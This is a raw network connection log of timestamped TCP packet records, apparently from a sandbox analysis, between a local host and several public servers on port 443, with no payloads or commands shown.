Apr 17, 2024 01:37:39.738997936 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.739049911 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.739068985 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.739092112 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.739099979 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.739140034 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.739506006 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.739582062 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.739626884 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.740679026 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.740684986 CEST	443	49711	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.740726948 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.740748882 CEST	49711	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.749082088 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.749209881 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.749300003 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.749465942 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.749471903 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.749495983 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.749564886 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.749572039 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.749598026 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.749680042 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.749697924 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.749845028 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.749893904 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.749902010 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.749988079 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.750036001 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.750041962 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.750237942 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.750283003 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.750288963 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.750387907 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.750442982 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.750447989 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.750540018 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.750612974 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.750617027 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.750638008 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.750686884 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.754678011 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.754836082 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.754916906 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.754997015 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.755000114 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.755028963 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.755057096 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.755142927 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.755187988 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.755198002 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.755280972 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.755331993 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.755338907 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.755439043 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.755486012 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.755494118 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.755585909 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.755634069 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.755640030 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.755728006 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.755773067 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.755780935 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.755872011 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.755928993 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.755935907 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.756014109 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.756062031 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.756068945 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.756191969 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.756237030 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.756243944 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.756370068 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.756426096 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.756436110 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.769979954 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.788053036 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.789115906 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.789180994 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.789189100 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.791891098 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.791963100 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.791970015 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.794825077 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.794878960 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.794886112 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.797590017 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.797643900 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.797651052 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.799972057 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.800260067 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.800316095 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.800323009 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.802007914 CEST	49718	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.802057028 CEST	443	49718	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.802225113 CEST	49718	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.802263975 CEST	49719	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.802309036 CEST	443	49719	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.802350998 CEST	49720	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.802364111 CEST	49719	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.802428007 CEST	443	49720	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.802500963 CEST	49720	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.802864075 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.802913904 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.802921057 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.803014994 CEST	49719	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.803049088 CEST	443	49719	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.803208113 CEST	49718	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.803224087 CEST	443	49718	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.803540945 CEST	49720	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.803559065 CEST	443	49720	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.805315018 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.805370092 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.805377007 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.807730913 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.808224916 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.808232069 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.812201977 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.812263012 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.812269926 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.825593948 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.825654984 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.825664997 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.825706959 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.825730085 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.825740099 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.825761080 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.825788021 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.836263895 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.836309910 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.836344957 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.836350918 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.836384058 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.852686882 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.852777004 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.853971958 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.854041100 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.854063034 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.854130030 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.854355097 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.854418039 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.854587078 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.854656935 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.860270977 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.860318899 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.860346079 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.860363960 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.860390902 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.860670090 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.860723972 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.860735893 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.860789061 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.860802889 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.860826015 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.860877037 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.866190910 CEST	49715	443	192.168.2.5	104.17.24.14
Apr 17, 2024 01:37:39.866219997 CEST	443	49715	104.17.24.14	192.168.2.5
Apr 17, 2024 01:37:39.880083084 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.892370939 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.892460108 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.892467976 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.892513990 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.892580032 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.892632961 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.901107073 CEST	49712	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:39.901115894 CEST	443	49712	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:39.903762102 CEST	49721	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:37:39.903830051 CEST	443	49721	64.233.177.99	192.168.2.5
Apr 17, 2024 01:37:39.903894901 CEST	49721	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:37:39.904345036 CEST	49721	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:37:39.904364109 CEST	443	49721	64.233.177.99	192.168.2.5
Apr 17, 2024 01:37:39.961291075 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:40.004132986 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.016464949 CEST	443	49719	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.026035070 CEST	443	49718	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.027049065 CEST	443	49720	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.052727938 CEST	49719	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.052748919 CEST	443	49719	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.053168058 CEST	49720	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.053226948 CEST	443	49720	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.054244041 CEST	443	49719	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.054303885 CEST	49718	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.054311037 CEST	49719	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.054320097 CEST	443	49718	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.055140018 CEST	49719	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.055217981 CEST	443	49719	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.055524111 CEST	49719	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.055531979 CEST	443	49719	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.055774927 CEST	443	49718	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.055840015 CEST	49718	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.056190014 CEST	49718	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.056269884 CEST	443	49718	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.056308031 CEST	49718	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.057044029 CEST	443	49720	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.057149887 CEST	49720	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.059111118 CEST	49720	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.059303999 CEST	443	49720	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.059307098 CEST	49720	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.069268942 CEST	49722	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:40.069314957 CEST	443	49722	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:40.069376945 CEST	49722	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:40.069783926 CEST	49722	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:40.069801092 CEST	443	49722	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:40.097613096 CEST	49719	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.098737955 CEST	49718	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.098752022 CEST	443	49718	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.100137949 CEST	443	49720	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.113087893 CEST	49720	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.113145113 CEST	443	49720	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.132174015 CEST	443	49721	64.233.177.99	192.168.2.5
Apr 17, 2024 01:37:40.132636070 CEST	49721	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:37:40.132668972 CEST	443	49721	64.233.177.99	192.168.2.5
Apr 17, 2024 01:37:40.134188890 CEST	443	49721	64.233.177.99	192.168.2.5
Apr 17, 2024 01:37:40.134277105 CEST	49721	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:37:40.136415005 CEST	49721	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:37:40.136485100 CEST	443	49721	64.233.177.99	192.168.2.5
Apr 17, 2024 01:37:40.143414021 CEST	49718	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.157640934 CEST	49720	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.187927961 CEST	49721	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:37:40.187957048 CEST	443	49721	64.233.177.99	192.168.2.5
Apr 17, 2024 01:37:40.228390932 CEST	49721	443	192.168.2.5	64.233.177.99
Apr 17, 2024 01:37:40.228801012 CEST	443	49719	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.228966951 CEST	443	49719	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.229012966 CEST	49719	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.231409073 CEST	49719	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.231429100 CEST	443	49719	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.235493898 CEST	443	49718	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.235630035 CEST	443	49718	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.235713005 CEST	49718	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.237533092 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.237662077 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.237725019 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:40.237752914 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.237847090 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.237894058 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:40.237910986 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.238025904 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.238070011 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:40.238084078 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.238179922 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.238221884 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:40.238234997 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.238332033 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.238374949 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:40.238388062 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.238478899 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.238528967 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:40.238540888 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.238878965 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.238923073 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:40.238935947 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.239049911 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.239092112 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:40.239104986 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.239198923 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.239243031 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:40.239254951 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.239794016 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.239841938 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:40.239854097 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.239995956 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.240044117 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:40.240232944 CEST	49718	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.240262032 CEST	443	49718	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.243453026 CEST	49709	443	192.168.2.5	104.18.3.35
Apr 17, 2024 01:37:40.243472099 CEST	443	49709	104.18.3.35	192.168.2.5
Apr 17, 2024 01:37:40.399456024 CEST	443	49722	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:40.415991068 CEST	49722	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:40.416027069 CEST	443	49722	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:40.419828892 CEST	443	49722	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:40.419913054 CEST	49722	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:40.602422953 CEST	443	49720	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.602575064 CEST	443	49720	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.602648020 CEST	49720	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.602706909 CEST	443	49720	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.602874994 CEST	443	49720	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.602945089 CEST	49720	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.672882080 CEST	49722	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:40.673120975 CEST	443	49722	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:40.673626900 CEST	49722	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:40.673676014 CEST	443	49722	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:40.698798895 CEST	49720	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:40.698858976 CEST	443	49720	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:40.727164984 CEST	49722	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:40.780489922 CEST	443	49722	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:40.780651093 CEST	443	49722	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:40.780720949 CEST	49722	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:40.986377001 CEST	49675	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:37:40.986387014 CEST	49674	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:37:41.094126940 CEST	49673	443	192.168.2.5	23.1.237.91
Apr 17, 2024 01:37:41.344238043 CEST	49722	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:41.344273090 CEST	443	49722	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:41.843023062 CEST	49725	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:41.843097925 CEST	443	49725	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:41.843185902 CEST	49725	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:41.845128059 CEST	49725	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:41.845165014 CEST	443	49725	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.017072916 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.017151117 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.017255068 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.017786026 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.017818928 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.079077005 CEST	443	49725	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.079231024 CEST	49725	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.093501091 CEST	49725	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.093580008 CEST	443	49725	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.094438076 CEST	443	49725	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.143846035 CEST	49725	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.165595055 CEST	49728	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:42.165627956 CEST	443	49728	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:42.165688992 CEST	49728	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:42.166137934 CEST	49728	443	192.168.2.5	13.107.213.41
Apr 17, 2024 01:37:42.166147947 CEST	443	49728	13.107.213.41	192.168.2.5
Apr 17, 2024 01:37:42.179610014 CEST	49725	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.224121094 CEST	443	49725	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.230283022 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.230880022 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.230942011 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.231261015 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.231914997 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.231977940 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.232548952 CEST	49726	443	192.168.2.5	199.36.158.100
Apr 17, 2024 01:37:42.280118942 CEST	443	49726	199.36.158.100	192.168.2.5
Apr 17, 2024 01:37:42.285048008 CEST	443	49725	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.285207033 CEST	443	49725	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.285288095 CEST	49725	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.316093922 CEST	49725	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.316137075 CEST	443	49725	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.316183090 CEST	49725	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.316198111 CEST	443	49725	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.373384953 CEST	49729	443	192.168.2.5	104.123.200.136
Apr 17, 2024 01:37:42.373447895 CEST	443	49729	104.123.200.136	192.168.2.5
Apr 17, 2024 01:37:42.373527050 CEST	49729	443	192.168.2.5	104.123.200.136
